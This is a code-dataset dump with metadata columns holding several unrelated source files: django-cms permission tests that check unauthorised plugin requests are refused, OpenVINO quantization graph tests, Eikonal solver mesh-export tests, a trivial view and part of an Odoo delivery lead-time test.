hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fbe703dc7ce7b89f04d8685a855de0529eaad5bb
| 10,409
|
py
|
Python
|
cms/tests/test_security.py
|
devyntk/django-cms
|
f889a30e94f268394ae9abf32c032239d0a9be55
|
[
"BSD-3-Clause"
] | 5,659
|
2015-01-01T02:42:30.000Z
|
2020-10-07T02:38:29.000Z
|
cms/tests/test_security.py
|
devyntk/django-cms
|
f889a30e94f268394ae9abf32c032239d0a9be55
|
[
"BSD-3-Clause"
] | 3,264
|
2015-01-02T10:11:48.000Z
|
2020-10-08T13:15:07.000Z
|
cms/tests/test_security.py
|
devyntk/django-cms
|
f889a30e94f268394ae9abf32c032239d0a9be55
|
[
"BSD-3-Clause"
] | 2,132
|
2015-01-01T11:28:21.000Z
|
2020-10-06T09:09:11.000Z
|
from django.conf import settings
from django.contrib.auth import get_user_model
from django.http import QueryDict
from cms.api import add_plugin, create_page
from cms.models.pluginmodel import CMSPlugin
from cms.test_utils.project.placeholderapp.models import Example1
from cms.test_utils.testcases import CMSTestCase
class SecurityTests(CMSTestCase):
"""
Test security issues by trying some naive requests to add/alter/delete data.
"""
def get_data(self):
page = create_page("page", "nav_playground.html", "en")
placeholder = page.placeholders.get(slot='body')
superuser = self.get_superuser()
staff = self.get_staff_user_with_no_permissions()
return page, placeholder, superuser, staff
def test_add(self):
"""
Test adding a plugin to a *PAGE*.
"""
page, placeholder, superuser, staff = self.get_data()
post_data = {}
self.assertEqual(CMSPlugin.objects.count(), 0)
# log the user out and post the plugin data to the cms add-plugin URL.
self.client.logout()
endpoint = self.get_add_plugin_uri(
placeholder,
'TextPlugin',
settings.LANGUAGES[0][0],
)
response = self.client.post(endpoint, post_data)
# since the user is not logged in, they should be prompted to log in.
self.assertEqual(response.status_code, 302)
querystring = QueryDict('', mutable=True)
querystring['next'] = endpoint
expected_url = '/{lang}/admin/login/?{next}'.format(
lang=settings.LANGUAGES[0][0],
next=querystring.urlencode(safe='/')
)
self.assertRedirects(response, expected_url)
self.assertEqual(CMSPlugin.objects.count(), 0)
# now log a staff user without permissions in and do the same as above.
self.client.login(username=getattr(staff, get_user_model().USERNAME_FIELD),
password=getattr(staff, get_user_model().USERNAME_FIELD))
response = self.client.post(endpoint, post_data)
# the user is logged in and the security check fails, so it should 403.
self.assertEqual(response.status_code, 403)
self.assertEqual(CMSPlugin.objects.count(), 0)
def test_edit(self):
"""
Test editing a *PAGE* plugin
"""
page, placeholder, superuser, staff = self.get_data()
# create the plugin using a superuser
plugin = add_plugin(placeholder, 'TextPlugin', 'en', body='body')
plugin_data = {
'plugin_id': plugin.pk,
'body': 'newbody',
}
self.assertEqual(plugin.body, 'body') # check the body is as expected.
# log the user out, try to edit the plugin
self.client.logout()
endpoint = self.get_change_plugin_uri(plugin)
response = self.client.post(endpoint, plugin_data)
# since the user is not logged in, they should be prompted to log in.
self.assertEqual(response.status_code, 302)
querystring = QueryDict('', mutable=True)
querystring['next'] = endpoint
expected_url = '/{lang}/admin/login/?{next}'.format(
lang=settings.LANGUAGES[0][0],
next=querystring.urlencode(safe='/')
)
self.assertRedirects(response, expected_url)
plugin = self.reload(plugin)
self.assertEqual(plugin.body, 'body')
# now log a staff user without permissions in and do the same as above.
self.client.login(username=getattr(staff, get_user_model().USERNAME_FIELD),
password=getattr(staff, get_user_model().USERNAME_FIELD))
response = self.client.post(endpoint, plugin_data)
# the user is logged in and the security check fails, so it should 403.
self.assertEqual(response.status_code, 403)
plugin = self.reload(plugin)
self.assertEqual(plugin.body, 'body')
def test_delete(self):
"""
Test deleting a *PAGE* plugin
"""
page, placeholder, superuser, staff = self.get_data()
plugin = add_plugin(placeholder, 'TextPlugin', 'en', body='body')
plugin_data = {
'plugin_id': plugin.pk,
}
plugin = self.reload(plugin)
self.assertEqual(plugin.body, 'body')
# log the user out, try to remove the plugin
self.client.logout()
endpoint = self.get_delete_plugin_uri(plugin)
response = self.client.post(endpoint, plugin_data)
# since the user is not logged in, they should be prompted to log in.
self.assertEqual(response.status_code, 302)
querystring = QueryDict('', mutable=True)
querystring['next'] = endpoint
expected_url = '/{lang}/admin/login/?{next}'.format(
lang=settings.LANGUAGES[0][0],
next=querystring.urlencode(safe='/')
)
self.assertRedirects(response, expected_url)
self.assertEqual(CMSPlugin.objects.count(), 1)
plugin = self.reload(plugin)
self.assertEqual(plugin.body, 'body')
# now log a staff user without permissions in and do the same as above.
self.client.login(username=getattr(staff, get_user_model().USERNAME_FIELD),
password=getattr(staff, get_user_model().USERNAME_FIELD))
response = self.client.post(endpoint, plugin_data)
# the user is logged in and the security check fails, so it should 403.
self.assertEqual(response.status_code, 403)
self.assertEqual(CMSPlugin.objects.count(), 1)
plugin = self.reload(plugin)
self.assertEqual(plugin.body, 'body')
def test_add_ph(self):
"""
Test adding a *NON PAGE* plugin
"""
page, placeholder, superuser, staff = self.get_data()
post_data = {}
endpoint = self.get_add_plugin_uri(placeholder, 'TextPlugin', settings.LANGUAGES[0][0])
self.assertEqual(CMSPlugin.objects.count(), 0)
# log the user out and try to add a plugin using PlaceholderAdmin
self.client.logout()
response = self.client.post(endpoint, post_data)
# since the user is not logged in, they should be prompted to log in.
self.assertEqual(response.status_code, 302)
querystring = QueryDict('', mutable=True)
querystring['next'] = endpoint
expected_url = '/{lang}/admin/login/?{next}'.format(
lang=settings.LANGUAGES[0][0],
next=querystring.urlencode(safe='/')
)
self.assertRedirects(response, expected_url)
self.assertEqual(CMSPlugin.objects.count(), 0)
# now log a staff user without permissions in and do the same as above.
self.client.login(username=getattr(staff, get_user_model().USERNAME_FIELD),
password=getattr(staff, get_user_model().USERNAME_FIELD))
response = self.client.post(endpoint, post_data)
# the user is logged in and the security check fails, so it should 403.
self.assertEqual(response.status_code, 403)
self.assertEqual(CMSPlugin.objects.count(), 0)
def test_edit_ph(self):
"""
Test editing a *NON PAGE* plugin
"""
page, placeholder, superuser, staff = self.get_data()
plugin = add_plugin(placeholder, 'TextPlugin', 'en', body='body')
endpoint = self.get_change_plugin_uri(plugin, container=Example1)
plugin_data = {
'body': 'newbody',
'language': 'en',
'plugin_id': plugin.pk,
}
plugin = self.reload(plugin)
self.assertEqual(plugin.body, 'body')
# log the user out and try to edit a plugin using PlaceholderAdmin
self.client.logout()
response = self.client.post(endpoint, plugin_data)
# since the user is not logged in, they should be prompted to log in.
self.assertEqual(response.status_code, 302)
querystring = QueryDict('', mutable=True)
querystring['next'] = endpoint
expected_url = '/{lang}/admin/login/?{next}'.format(
lang=settings.LANGUAGES[0][0],
next=querystring.urlencode(safe='/')
)
self.assertRedirects(response, expected_url)
plugin = self.reload(plugin)
self.assertEqual(plugin.body, 'body')
# now log a staff user without permissions in and do the same as above.
self.client.login(username=getattr(staff, get_user_model().USERNAME_FIELD),
password=getattr(staff, get_user_model().USERNAME_FIELD))
response = self.client.post(endpoint, plugin_data)
# the user is logged in and the security check fails, so it should 403.
self.assertEqual(response.status_code, 403)
plugin = self.reload(plugin)
self.assertEqual(plugin.body, 'body')
def test_delete_ph(self):
page, placeholder, superuser, staff = self.get_data()
plugin = add_plugin(placeholder, 'TextPlugin', 'en', body='body')
plugin_data = {
'plugin_id': plugin.pk,
}
plugin = self.reload(plugin)
self.assertEqual(plugin.body, 'body')
endpoint = self.get_delete_plugin_uri(plugin, container=Example1)
# log the user out and try to remove a plugin using PlaceholderAdmin
self.client.logout()
response = self.client.post(endpoint, plugin_data)
# since the user is not logged in, they should be prompted to log in.
self.assertEqual(response.status_code, 302)
querystring = QueryDict('', mutable=True)
querystring['next'] = endpoint
expected_url = '/{lang}/admin/login/?{next}'.format(
lang=settings.LANGUAGES[0][0],
next=querystring.urlencode(safe='/')
)
self.assertRedirects(response, expected_url)
self.assertEqual(CMSPlugin.objects.count(), 1)
# now log a staff user without permissions in and do the same as above.
self.client.login(username=getattr(staff, get_user_model().USERNAME_FIELD),
password=getattr(staff, get_user_model().USERNAME_FIELD))
response = self.client.post(endpoint, plugin_data)
# the user is logged in and the security check fails, so it should 403.
self.assertEqual(response.status_code, 403)
self.assertEqual(CMSPlugin.objects.count(), 1)
| 46.46875
| 95
| 0.637813
| 1,254
| 10,409
| 5.1874
| 0.105263
| 0.073789
| 0.023982
| 0.040584
| 0.874712
| 0.865027
| 0.859032
| 0.840892
| 0.828593
| 0.819985
| 0
| 0.010712
| 0.255644
| 10,409
| 223
| 96
| 46.67713
| 0.828859
| 0.182438
| 0
| 0.758824
| 0
| 0
| 0.049437
| 0.019392
| 0
| 0
| 0
| 0
| 0.223529
| 1
| 0.041176
| false
| 0.035294
| 0.041176
| 0
| 0.094118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2209f87e0d421461e944ecc57c3f2fae32d256af
| 7,250
|
py
|
Python
|
model-optimizer/unit_tests/extensions/front/onnx/quantize_linear_resolver_test.py
|
ledmonster/openvino
|
c1b1e2e7afc698ac82b32bb1f502ad2e90cd1419
|
[
"Apache-2.0"
] | null | null | null |
model-optimizer/unit_tests/extensions/front/onnx/quantize_linear_resolver_test.py
|
ledmonster/openvino
|
c1b1e2e7afc698ac82b32bb1f502ad2e90cd1419
|
[
"Apache-2.0"
] | 26
|
2021-01-18T16:21:41.000Z
|
2022-02-21T13:04:24.000Z
|
model-optimizer/unit_tests/extensions/front/onnx/quantize_linear_resolver_test.py
|
ngaloppo/openvino
|
7aad8827a585e2e08c5fd872bb17e40072718661
|
[
"Apache-2.0"
] | 1
|
2021-08-18T14:29:37.000Z
|
2021-08-18T14:29:37.000Z
|
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
import numpy as np
from extensions.front.onnx.quantize_linear_resolver import QuantizeLinearResolver
from mo.utils.ir_engine.compare_graphs import compare_graphs
from unit_tests.utils.graph import build_graph
nodes1_attributes = {
'input': {'kind': 'op', 'op': 'AnyOp'},
'quantize': {'kind': 'op', 'op': 'QuantizeLinear'},
'scale_param_q': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
'zerop_param_q': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
'out': {'kind': 'op', 'op': 'AnyOp'},
}
nodes_ref_attributes = {
'input': {'kind': 'op', 'op': 'AnyOp'},
'cast': {'kind': 'op', 'op': 'Cast', 'type': 'Convert'},
'f_quantize': {'kind': 'op', 'op': 'FakeQuantize', 'type': 'FakeQuantize'},
'mul1': {'kind': 'op', 'op': 'Mul', 'type': 'Multiply'},
'mul2': {'kind': 'op', 'op': 'Mul', 'type': 'Multiply'},
'scale_param_q': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
'in_low': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
'in_high': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
'out_low': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
'out_high': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
'out': {'kind': 'op', 'op': 'AnyOp'},
}
class TestQuantizeLinearResolver(unittest.TestCase):
def test_quantize_uint8(self):
graph = build_graph(nodes1_attributes,
[('input', 'quantize'),
('scale_param_q', 'quantize'),
('zerop_param_q', 'quantize'),
('quantize', 'out'),
],
{'scale_param_q': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
'zerop_param_q': {'shape': np.array([]), 'value': np.uint8(128)},
}, nodes_with_edges_only=True)
graph_ref = build_graph(nodes_ref_attributes,
[('input', 'f_quantize'),
('scale_param_q', 'mul1', {'out': 0}),
('in_low', 'mul1'),
('mul1', 'f_quantize'),
('scale_param_q', 'mul2', {'out': 0}),
('in_high', 'mul2'),
('mul2', 'f_quantize'),
('out_low', 'f_quantize'),
('out_high', 'f_quantize'),
('f_quantize', 'cast'),
('cast', 'out'),
],
{'in_low': {'shape': np.array([]), 'value': -128},
'in_high': {'shape': np.array([]), 'value': 127},
'out_low': {'shape': np.array([]), 'value': 0},
'out_high': {'shape': np.array([]), 'value': 255},
'cast': {'dst_type': np.uint8}
}, nodes_with_edges_only=True)
graph.stage = 'front'
QuantizeLinearResolver().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'out', check_op_attrs=True)
self.assertTrue(flag, resp)
def test_quantize_int8(self):
graph = build_graph(nodes1_attributes,
[('input', 'quantize'),
('scale_param_q', 'quantize'),
('zerop_param_q', 'quantize'),
('quantize', 'out'),
],
{'scale_param_q': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
'zerop_param_q': {'shape': np.array([]), 'value': np.int8(0)},
}, nodes_with_edges_only=True)
graph_ref = build_graph(nodes_ref_attributes,
[('input', 'f_quantize'),
('scale_param_q', 'mul1', {'out': 0}),
('in_low', 'mul1'),
('mul1', 'f_quantize'),
('scale_param_q', 'mul2', {'out': 0}),
('in_high', 'mul2'),
('mul2', 'f_quantize'),
('out_low', 'f_quantize'),
('out_high', 'f_quantize'),
('f_quantize', 'cast'),
('cast', 'out'),
],
{'in_low': {'shape': np.array([]), 'value': -128},
'in_high': {'shape': np.array([]), 'value': 127},
'out_low': {'shape': np.array([]), 'value': -128},
'out_high': {'shape': np.array([]), 'value': 127},
'cast': {'dst_type': np.int8}
}, nodes_with_edges_only=True)
graph.stage = 'front'
QuantizeLinearResolver().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'out', check_op_attrs=True)
self.assertTrue(flag, resp)
def test_quantize_no_zerop(self):
graph = build_graph(nodes1_attributes,
[('input', 'quantize'),
('scale_param_q', 'quantize'),
('quantize', 'out'),
],
{'scale_param_q': {'shape': np.array([]), 'value': np.float32(1.0 / 255)},
}, nodes_with_edges_only=True)
graph_ref = build_graph(nodes_ref_attributes,
[('input', 'f_quantize'),
('scale_param_q', 'mul1', {'out': 0}),
('in_low', 'mul1'),
('mul1', 'f_quantize'),
('scale_param_q', 'mul2', {'out': 0}),
('in_high', 'mul2'),
('mul2', 'f_quantize'),
('out_low', 'f_quantize'),
('out_high', 'f_quantize'),
('f_quantize', 'cast'),
('cast', 'out'),
],
{'in_low': {'shape': np.array([]), 'value': 0},
'in_high': {'shape': np.array([]), 'value': 255},
'out_low': {'shape': np.array([]), 'value': 0},
'out_high': {'shape': np.array([]), 'value': 255},
'cast': {'dst_type': np.uint8}
}, nodes_with_edges_only=True)
graph.stage = 'front'
QuantizeLinearResolver().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'out', check_op_attrs=True)
self.assertTrue(flag, resp)
| 50
| 102
| 0.403034
| 631
| 7,250
| 4.37401
| 0.14897
| 0.041304
| 0.073913
| 0.10471
| 0.827536
| 0.821739
| 0.76413
| 0.743478
| 0.729348
| 0.705435
| 0
| 0.024384
| 0.423034
| 7,250
| 144
| 103
| 50.347222
| 0.635429
| 0.010621
| 0
| 0.756098
| 0
| 0
| 0.206695
| 0
| 0
| 0
| 0
| 0
| 0.02439
| 1
| 0.02439
| false
| 0
| 0.04065
| 0
| 0.073171
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
97e7f81531270b3e8c1e2b13604fd65beea47e55
| 186
|
py
|
Python
|
views/teams.py
|
Nicolasopf/Metrevs
|
5625e84332a527a35e70f0ac8f35facacbfc2277
|
[
"MIT"
] | 1
|
2021-07-06T17:49:39.000Z
|
2021-07-06T17:49:39.000Z
|
views/teams.py
|
Nicolasopf/Metrevs
|
5625e84332a527a35e70f0ac8f35facacbfc2277
|
[
"MIT"
] | null | null | null |
views/teams.py
|
Nicolasopf/Metrevs
|
5625e84332a527a35e70f0ac8f35facacbfc2277
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
''' View for /teams show teams data processed '''
from views import app_views
@app_views.route('/teams')
def show_teams():
''' Show teams... '''
return 'hi'
| 18.6
| 49
| 0.645161
| 26
| 186
| 4.5
| 0.653846
| 0.230769
| 0.239316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006536
| 0.177419
| 186
| 9
| 50
| 20.666667
| 0.75817
| 0.403226
| 0
| 0
| 0
| 0
| 0.081633
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
3f4180388e8f7b019a5a435bd41d3325344f562c
| 1,949
|
py
|
Python
|
test/test_meshio.py
|
keurfonluu/fteikpy
|
39e50b1772642b9c5cdda4d1b8171f6d5abaa5e2
|
[
"BSD-3-Clause"
] | 15
|
2020-11-11T21:42:46.000Z
|
2022-03-20T10:21:47.000Z
|
test/test_meshio.py
|
keurfonluu/fteikpy
|
39e50b1772642b9c5cdda4d1b8171f6d5abaa5e2
|
[
"BSD-3-Clause"
] | 10
|
2020-11-12T08:39:25.000Z
|
2022-03-30T10:56:51.000Z
|
test/test_meshio.py
|
keurfonluu/fteikpy
|
39e50b1772642b9c5cdda4d1b8171f6d5abaa5e2
|
[
"BSD-3-Clause"
] | 5
|
2020-12-23T01:19:27.000Z
|
2022-02-24T14:16:56.000Z
|
import numpy
from fteikpy import Eikonal2D, Eikonal3D, grid_to_meshio, ray_to_meshio
def test_meshio_2d():
nz, nx = 8, 10
eik = Eikonal2D(numpy.ones((nz, nx)), (1.0, 1.0))
tt = eik.solve((float(nz // 2), float(nx // 2)), return_gradient=True)
ray = tt.raytrace((0.0, 0.0), honor_grid=True)
mesh = grid_to_meshio(eik, tt)
mesh_ray = ray_to_meshio(ray)
npts = (nz + 1) * (nx + 1)
assert len(mesh.points) == npts
assert sum(len(cell) for cell in mesh.cells) == nz * nx
assert mesh.point_data["Traveltime"][npts // 2] == 0.0
assert numpy.allclose(mesh.point_data["Traveltime"].sum(), 378.23469225)
for grad in mesh.point_data["Gradient"].T:
assert grad[npts // 2] == 0.0
assert numpy.allclose(grad.sum(), 0.0)
assert mesh.cell_data["Velocity"][0].sum() == nz * nx
assert len(mesh_ray.points) == len(ray)
assert len(mesh_ray.cells[0][1]) == len(ray) - 1
assert mesh_ray.cells[0][1].sum() == 64.0
def test_meshio_3d():
nz, nx, ny = 8, 10, 12
eik = Eikonal3D(numpy.ones((nz, nx, ny)), (1.0, 1.0, 1.0))
tt = eik.solve(
(float(nz // 2), float(nx // 2), float(ny // 2)), return_gradient=True
)
ray = tt.raytrace((0.0, 0.0, 0.0), honor_grid=True)
mesh = grid_to_meshio(eik, tt)
mesh_ray = ray_to_meshio(ray)
npts = (nz + 1) * (nx + 1) * (ny + 1)
assert len(mesh.points) == npts
assert sum(len(cell) for cell in mesh.cells) == nz * nx * ny
assert mesh.point_data["Traveltime"][npts // 2] == 0.0
assert numpy.allclose(mesh.point_data["Traveltime"].sum(), 6909.90160991)
for grad in mesh.point_data["Gradient"].T:
assert grad[npts // 2] == 0.0
assert numpy.allclose(grad.sum(), 0.0)
assert mesh.cell_data["Velocity"][0].sum() == nz * nx * ny
assert len(mesh_ray.points) == len(ray)
assert len(mesh_ray.cells[0][1]) == len(ray) - 1
assert mesh_ray.cells[0][1].sum() == 169.0
| 32.483333
| 78
| 0.605439
| 323
| 1,949
| 3.541796
| 0.173375
| 0.024476
| 0.015734
| 0.013986
| 0.812937
| 0.812937
| 0.812937
| 0.812937
| 0.812937
| 0.812937
| 0
| 0.06645
| 0.212417
| 1,949
| 59
| 79
| 33.033898
| 0.678827
| 0
| 0
| 0.428571
| 0
| 0
| 0.036942
| 0
| 0
| 0
| 0
| 0
| 0.47619
| 1
| 0.047619
| false
| 0
| 0.047619
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58d912b021566eccf850b54e82e71b68b8918cb8
| 14,141
|
py
|
Python
|
odoo-13.0/addons/sale_stock/tests/test_sale_stock_lead_time.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | 12
|
2021-03-26T08:39:40.000Z
|
2022-03-16T02:20:10.000Z
|
odoo-13.0/addons/sale_stock/tests/test_sale_stock_lead_time.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | 13
|
2020-12-20T16:00:21.000Z
|
2022-03-14T14:55:30.000Z
|
odoo-13.0/addons/sale_stock/tests/test_sale_stock_lead_time.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | 17
|
2020-08-31T11:18:49.000Z
|
2022-02-09T05:57:31.000Z
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from datetime import timedelta
from odoo import fields
from odoo.addons.stock.tests.common2 import TestStockCommon
class TestSaleStockLeadTime(TestStockCommon):
def setUp(self):
super(TestSaleStockLeadTime, self).setUp()
# Update the product_1 with type and Customer Lead Time
self.product_1.write({'type': 'product',
'sale_delay': 5.0})
def test_00_product_company_level_delays(self):
""" In order to check schedule date, set product's Customer Lead Time
and company's Sales Safety Days."""
company = self.env.ref('base.main_company')
# Update company with Sales Safety Days
company.write({'security_lead': 3.00})
# Create sale order of product_1
order = self.env['sale.order'].create({
'partner_id': self.partner_1.id,
'partner_invoice_id': self.partner_1.id,
'partner_shipping_id': self.partner_1.id,
'pricelist_id': self.env.ref('product.list0').id,
'picking_policy': 'direct',
'warehouse_id': self.warehouse_1.id,
'order_line': [(0, 0, {'name': self.product_1.name,
'product_id': self.product_1.id,
'product_uom_qty': 10,
'product_uom': self.uom_unit.id,
'customer_lead': self.product_1.sale_delay})]})
# Confirm our standard sale order
order.action_confirm()
# Check the picking crated or not
self.assertTrue(order.picking_ids, "Picking should be created.")
# Check schedule date of picking
out_date = fields.Datetime.from_string(order.date_order) + timedelta(days=self.product_1.sale_delay) - timedelta(days=company.security_lead)
min_date = fields.Datetime.from_string(order.picking_ids[0].scheduled_date)
self.assertTrue(abs(min_date - out_date) <= timedelta(seconds=1), 'Schedule date of picking should be equal to: order date + Customer Lead Time - Sales Safety Days.')
def test_01_product_route_level_delays(self):
""" In order to check schedule dates, set product's Customer Lead Time
and warehouse route's delay."""
# Update warehouse_1 with Outgoing Shippings pick + pack + ship
self.warehouse_1.write({'delivery_steps': 'pick_pack_ship'})
# Set delay on pull rule
for pull_rule in self.warehouse_1.delivery_route_id.rule_ids:
pull_rule.write({'delay': 2})
# Create sale order of product_1
order = self.env['sale.order'].create({
'partner_id': self.partner_1.id,
'partner_invoice_id': self.partner_1.id,
'partner_shipping_id': self.partner_1.id,
'pricelist_id': self.env.ref('product.list0').id,
'picking_policy': 'direct',
'warehouse_id': self.warehouse_1.id,
'order_line': [(0, 0, {'name': self.product_1.name,
'product_id': self.product_1.id,
'product_uom_qty': 5,
'product_uom': self.uom_unit.id,
'customer_lead': self.product_1.sale_delay})]})
# Confirm our standard sale order
order.action_confirm()
# Check the picking crated or not
self.assertTrue(order.picking_ids, "Pickings should be created.")
# Check schedule date of ship type picking
out = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.out_type_id)
out_min_date = fields.Datetime.from_string(out.scheduled_date)
out_date = fields.Datetime.from_string(order.date_order) + timedelta(days=self.product_1.sale_delay) - timedelta(days=out.move_lines[0].rule_id.delay)
self.assertTrue(abs(out_min_date - out_date) <= timedelta(seconds=1), 'Schedule date of ship type picking should be equal to: order date + Customer Lead Time - pull rule delay.')
# Check schedule date of pack type picking
pack = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.pack_type_id)
pack_min_date = fields.Datetime.from_string(pack.scheduled_date)
pack_date = out_date - timedelta(days=pack.move_lines[0].rule_id.delay)
